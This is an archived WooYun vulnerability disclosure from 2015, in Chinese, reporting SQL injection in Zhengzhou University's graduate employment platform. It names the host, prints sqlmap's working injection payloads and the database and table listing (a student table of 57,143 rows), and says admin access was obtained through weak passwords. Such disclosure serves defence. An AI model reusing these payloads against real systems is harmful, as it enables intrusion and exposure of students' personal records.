乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-03: 细节已通知厂商并且等待厂商处理中 2015-06-08: 厂商已经主动忽略漏洞,细节向公众公开
郑州大学某系统SQL注入可获近几年毕业生信息,就业档案等
问题平台:http://qy.zzu.edu.cn:81/login.php 郑州大学就业综合服务平台目测没考虑参数过滤,众多参数都存在sql注入,不一一列了,简单列出几个证明下
后台登陆:http://qy.zzu.edu.cn:81/admin/login.php
注入证明:
sqlmap identified the following injection points with a total of 429 HTTP(s) requests:---Parameter: b (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: b=admin' RLIKE (SELECT (CASE WHEN (2958=2958) THEN 0x61646d696e ELSE 0x28 END)) AND 'OjvK'='OjvK&c=admin&d=gjqt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: b=admin' AND (SELECT 1595 FROM(SELECT COUNT(*),CONCAT(0x717a716b71,(SELECT (ELT(1595=1595,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pKBv'='pKBv&c=admin&d=gjqt Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: b=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))nEDw) AND 'vGoM'='vGoM&c=admin&d=gjqt---web server operating system: Windowsweb application technology: PHP 5.2.5, Apache 2.2.6back-end DBMS: MySQL 5.0available databases [7]:[*] eeee[*] information_schema[*] mycounter[*] mysql[*] phpmyadmin[*] test[*] zhengda
Database: zhengda[43 tables]+-----------------------+---------+| Table | Entries |+-----------------------+---------+| xuesheng | 57143 || denglu | 57041 || qiye | 49473 || guanli_log | 39594 || da_log | 32660 || lishi_aaa | 18562 || login_logout | 15599 || renshidaili | 7771 || `20140731ren` | 6624 || tmp_users | 3890 || xl_tongji | 3890 || diqu1 | 3523 || diqu_ban | 3523 || diqu_1 | 3419 || diqu | 2412 || diqu_new_20140912 | 2411 |
找出管理员账号密码登陆:
近几年的毕业生档案就业信息从数据库中可知57143条
今年的毕业人数
登陆系统后又发现了好多处SQL注入点,和管理员账号的弱口令,请自查。
修复注入,拒绝弱口令。
危害等级:无影响厂商忽略
忽略时间:2015-06-08 14:44
暂无